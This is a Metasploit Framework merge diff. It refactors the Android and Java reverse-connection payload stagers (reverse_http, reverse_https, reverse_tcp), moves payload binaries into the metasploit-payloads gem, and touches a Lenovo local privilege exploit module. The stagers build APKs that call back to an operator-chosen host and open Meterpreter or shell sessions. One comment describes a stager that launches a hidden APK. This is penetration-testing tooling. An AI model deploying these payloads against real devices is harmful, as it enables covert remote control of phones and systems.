Merge branch 'master' of github.com:rapid7/metasploit-framework

.gitignore

@@ -69,7 +69,10 @@ external/source/exploits/**/Release
 # the metasploit-payloads gem.
 data/meterpreter/*.dll
 data/meterpreter/*.bin
+data/meterpreter/*.jar
 data/meterpreter/*.lso
+data/android
+data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 1.0.1)
+      metasploit-payloads (= 1.0.2)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.1)
+    metasploit-payloads (1.0.2)
     metasploit_data_models (1.1.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)

lib/msf/base/sessions/meterpreter_android.rb

@@ -19,13 +19,6 @@ class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java
     self.platform = 'java/android'
   end
 
-  def load_android
-    original = console.disable_output  
-    console.disable_output = true
-    console.run_single('load android')
-    console.disable_output = original
-  end
-
 end
 
 end

lib/msf/base/sessions/meterpreter_options.rb

@@ -64,12 +64,6 @@ module MeterpreterOptions
         end
       end
 
-      if session.platform =~ /android/i
-        if datastore['AutoLoadAndroid']
-          session.load_android
-        end
-      end
-
       [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
         if (datastore[key].empty? == false)
           args = Shellwords.shellwords( datastore[key] )

lib/msf/core/exploit/android.rb

@@ -87,8 +87,7 @@ module Exploit::Android
 
   # The NDK stager is used to launch a hidden APK
   def ndkstager(stagename, arch)
-    path = ['data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so']
-    data = File.read(File.join(Msf::Config::InstallRoot, *path), :mode => 'rb')
+    data = MetasploitPayloads.read('android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
     data.gsub!('PLOAD', stagename)
   end
 

lib/msf/core/payload/dalvik.rb

@@ -31,6 +31,11 @@ module Msf::Payload::Dalvik
     [str.length].pack("N") + str
   end
 
+  def apply_options(classes)
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['SessionRetryTotal'].to_s)
+    string_sub(classes, 'SSSS                                ', "SSSS" + datastore['SessionRetryWait'].to_s)
+  end
+
   def string_sub(data, placeholder="", input="")
     data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
   end

metasploit-framework.gemspec

@@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.1'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.2'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

modules/exploits/windows/local/lenovo_systemupdate.rb

@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Local
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
-          'Micahel Milvich', # vulnerability discovery, advisory
+          'Michael Milvich', # vulnerability discovery, advisory
           'Sofiane Talmat',  # vulnerability discovery, advisory
           'h0ng10'           # Metasploit module
         ],
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Local
   def get_security_token(lenovo_directory)
     unless client.railgun.get_dll('tvsutil')
       client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
-      client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
+      client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')
     end
 
     dll_response = client.railgun.tvsutil.GetSystemInfoData(256)

modules/payloads/stagers/android/reverse_http.rb

@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_http'
+require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
@@ -12,6 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Dalvik
+  include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,
@@ -24,31 +26,32 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseHttp,
       'Stager'        => {'Payload' => ""}
       ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def generate_jar(opts={})
-    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
-    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
-    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
+
+    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
+    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    lurl << "/"
+    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
+
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
+    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+    apply_options(classes)
 
     jar = Rex::Zip::Jar.new
-
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
-
     files = [
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-
-    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert

modules/payloads/stagers/android/reverse_https.rb

@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
+require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
@@ -12,6 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Dalvik
+  include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,
@@ -24,31 +26,40 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseHttps,
       'Stager'        => {'Payload' => ""}
     ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def generate_jar(opts={})
-    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
-    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
-    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
+
+    lurl = "ZZZZhttps://#{datastore["LHOST"]}"
+    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    lurl << "/"
+    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
+
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
+    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+
+    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                         datastore['HandlerSSLCert'])
+    if verify_cert_hash
+        hash = 'WWWW' + verify_cert_hash.unpack("H*").first
+        string_sub(classes, 'WWWW                                        ', hash)
+    end
+
+    apply_options(classes)
 
     jar = Rex::Zip::Jar.new
-
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + host + ":" + port)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
-
     files = [
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-
-    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert

modules/payloads/stagers/android/reverse_tcp.rb

@@ -26,21 +26,21 @@ module Metasploit3
       'Handler'		=> Msf::Handler::ReverseTcp,
       'Stager'		=> {'Payload' => ""}
     ))
+  end
 
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
+  def include_send_uuid
+      false
   end
 
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
 
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
 
     string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    apply_options(classes)
+
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [
@@ -48,7 +48,7 @@ module Metasploit3
       [ "resources.arsc" ]
     ]
 
-    jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert

modules/payloads/stagers/java/reverse_tcp.rb

@@ -41,6 +41,10 @@ module Metasploit3
     @class_files = [ ]
   end
 
+  def include_send_uuid
+      false
+  end
+
   def config
     spawn = datastore["Spawn"] || 2
     c =  ""

modules/payloads/stages/android/meterpreter.rb

@@ -39,11 +39,8 @@ module Metasploit3
   def generate_stage(opts={})
     # TODO: wire the UUID into the stage
     clazz = 'androidpayload.stage.Meterpreter'
-    file = File.join(Msf::Config.data_directory, "android", "metstage.jar")
-    metstage = File.open(file, "rb") {|f| f.read(f.stat.size) }
-
-    file = File.join(Msf::Config.data_directory, "android", "meterpreter.jar")
-    met = File.open(file, "rb") {|f| f.read(f.stat.size) }
+    metstage = MetasploitPayloads.read("android", "metstage.jar")
+    met = MetasploitPayloads.read("android", "meterpreter.jar")
 
     # Name of the class to load from the stage, the actual jar to load
     # it from, and then finally the meterpreter stage

modules/payloads/stages/android/shell.rb

@@ -36,8 +36,7 @@ module Metasploit3
   #
   def generate_stage(opts={})
     clazz = 'androidpayload.stage.Shell'
-    file = File.join(Msf::Config.data_directory, "android", "shell.jar")
-    shell_jar = File.open(file, "rb") {|f| f.read(f.stat.size) }
+    shell_jar = MetasploitPayloads.read("android", "shell.jar")
 
     # Name of the class to load from the stage, and then the actual jar
     # to load it from